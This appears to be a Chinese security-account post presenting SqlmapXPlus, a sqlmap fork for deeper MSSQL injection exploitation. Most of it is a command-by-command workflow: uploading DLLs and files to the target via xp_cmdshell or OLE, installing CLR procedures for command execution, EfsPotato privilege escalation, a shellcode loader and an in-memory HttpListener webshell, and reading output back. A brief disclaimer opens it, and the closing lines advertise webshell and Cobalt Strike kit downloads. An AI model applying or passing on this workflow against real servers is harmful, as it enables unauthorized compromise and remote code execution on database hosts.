赛博大作战中的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!
sqlmapxplus 基于sqlmap,参考各种解决方法,增强MSSQL数据库注入的利用方式
工具地址:https://github.com/co01cat/SqlmapXPlus 前版本的使用说明:https://mp.weixin.qq.com/s/nTYPKnl9XQLWhZ43sQV3xw
发现问题:1. 针对实际网络过程中dll传输损失导致clr安装失败的问题(临时解决方法)发现在原--install-clr功能中使用的clr dll太大,在实战中往往需要注 入的大量次数,如果注入过程中的某一次出现错误,会导致dll落地失败,无法成功打入dll,现将原本一键自动安装的流程去除,修改为用户需要根据实际的目标情况,自定义的dll安装临时增加 --check-file 选项判断dll文件是否成功落地目标主机临时增加--check-clr 判断用户自定义函数是否在数据库中加载成功2. 为什么使用上传过程中会出现dll放大的问题转换为十六进制落地再还原导致的文件增大,如字母 A 经过十六进制 会转换 为 41,则增大一倍3. 自定义clr的问题(已完成)install-clr修改为,需要指定自定义的clr.dll路径,在提示框输入 用户自定义类名 用户自定义方法名clr_shell模式下执行clr函数的方式修改为:用户自定义function 传入参数(已完成)更新内容:新增开启ole功能新增指定文件读取功能新增指定文件移动功能新增指定文件复制功能新增指定文件删除功能新增指定文件位置判断功能新增存储过程查询功能新增删除存储过程功能修改ole上传方式修改clr安装流程修改clr命令执行方式去除中文注释导致的报错更新功能:File system access:--xp-upload upload file by xp_cmdshell--ole-upload upload file by ole--check-file use xp_fileexis check file exist--ole-del delete file by ole--ole-read read file content by ole--ole-move move file by ole--ole-copy copy file by oleOperating system access:--enable-clr enable clr--disable-clr disable clr--enable-ole enable ole--check-clr check user-defined functions in the database--del-clr delete user-defined functions in the database--install-clr install clr--clr-shell clr shell--sharpshell-upload1 sharpshell upload1--sharpshell-upload2 sharpshell upload2
# 关于ole的功能介绍about ole:# 开启 ole 利用功能python sqlmap.py -r/-u xxx --enable-ole# 通过 ole 上传文件python sqlmap.py -r/-u xxx --ole-upload local_file_path --file-dest remote_file_path# 通过 ole 删除指定文件python sqlmap.py -r/-u xxx --ole-del remote_file_path# 通过 ole 阅读指定文件python sqlmap.py -r/-u xxx --ole-read remote_file_path# 通过 ole 移动并重命名文件python sqlmap.py -r/-u xxx --ole-move remote_file_path1 --file-dest remote_file_path# 通过 ole 复制文件python sqlmap.py -r/-u xxx --ole-copy remote_file_path1 --file-dest remote_file_path2# 通过 ole 实现的HttpListener内存马上传方式# 默认上传至c:\Windows\tasks\listen.tmp.txt,需要以system权限运行python sqlmap.py -r/-u xxx --sharpshell-upload2# 相关功能介绍other function:# 通过 xp_cmdshell 上传文件python sqlmap.py -r/-u xxx --xp-upload local_file_path --file-dest remote_file_path# 使用 xp_fileexis 来检查文件是否存在python sqlmap.py -r/-u xxx --check-file remote_file_path# 查询数据库中是否存在用户自定义函数python sqlmap.py -r/-u xxx --check-clr clr_function_name# 删除用户自定义函数python sqlmap.py -r/-u xxx --del-clr clr_function_name# 通过 xp_cmdshell实现的HttpListener内存马上传方式# 默认上传至c:\Windows\tasks\listen.tmp.txt,需要以system权限运行python sqlmap.py -r/-u xxx --sharpshell-upload1# 关于clr的功能介绍:# 开启 clr 利用功能python sqlmap.py -r/-u xxx --enable-clr# 关闭 clr 利用功能python sqlmap.py -r/-u xxx --disable-clr# 进入 clr 安装模式python sqlmap.py -r/-u xxx --install-clr# 进入 clr-shell 命令交互模式python sqlmap.py -r/-u xxx --clr-shell# clr dll 参考如下,更多其他dll请参考星球获取# 存储过程类名Xplus,存储过程函数名需要注意大小写,分别为# ClrExec、ClrEfsPotato、ClrDownload、ClrShellcodeLoader# 对应项目目录下单独功能的dll,分别为clrexec.dllclrefspotato.dllclrdownload.dllclrshellcodeloader.dl
根据目标情况,选择自己修改好合适大小的clr dll通过文件上传至目标主机
python sqlmap.py -r/-u xxx --random-agent --xp-upload clrdemo.dll --file-dest c:\windows\tasks\clrexec.dll通过--check-file检查dll是否成功落地,通过注入传输不稳定将导致失败,有时需要多打几次
python sqlmap.py -r/-u xxx --random-agent --check-file c:\windows\tasks\clrexec.dll看到提示目标文件存在,就可以进行下一步
加载远程dll,输入远程dll路径、用户自定义存储过程的相关信息
python sqlmap.py -r test.txt --random-agent --enable-clrpython sqlmap.py -r/-u xxx --random-agent --install-clr
CLR程序集名称可以任意,通过--check-clr检查自定义存储过程是否加载成功
python sqlmap.py -r/-u xxx --random-agent --check-clr clrexec看到提示自定义存储过程存在数据库中,就可以进行下一步
进入clr-shell模式,执行自定义clr存储过程,所有执行均为无回显执行,需要自行判断执行是否成功
python sqlmap.py -r test.txt --random-agent --clr-shellinput procedure name> 用户自定义存储过程名称
# 运行打入的ClrExecinput procedure name> ClrExecclr-shell>clr_exec whoami > c:\windows\tasks\111.txt# EfsPotato同理打入目录下的clrefspotato.dll后input procedure name> ClrEfsPotatoclr-shell>clr_efspotato whoami > c:\windows\tasks\222.txt
如命令执行功能,可以通过输出重定向 配合 --ole-read 获取回显
python sqlmap.py -r test.txt --random-agent --enable-olepython sqlmap.py -r/-u xxx --random-agent --ole-read c:\windows\tasks\111.txt
注:如有侵权请后台联系进行删除
觉得内容不错,请点一下"赞"和"在看"
1、公众号后台回复:搜索大法,获取searchall工具下载链接。
2、公众号后台回复:靶场,获取靶场工具网盘下载链接。
3、公众号后台回复:webshell,获取webshell下载链接。
4、公众号后台回复:验证码,获取验证码工具下载链接。
5.公众号后台回复:应急响应,获取应急响应网盘下载链接。
6.公众号后台回复:CS,获取CS渗透工具包网盘下载链接。
7.公众号点菜单栏"工具合集",后台回复"嗨"即可获取!
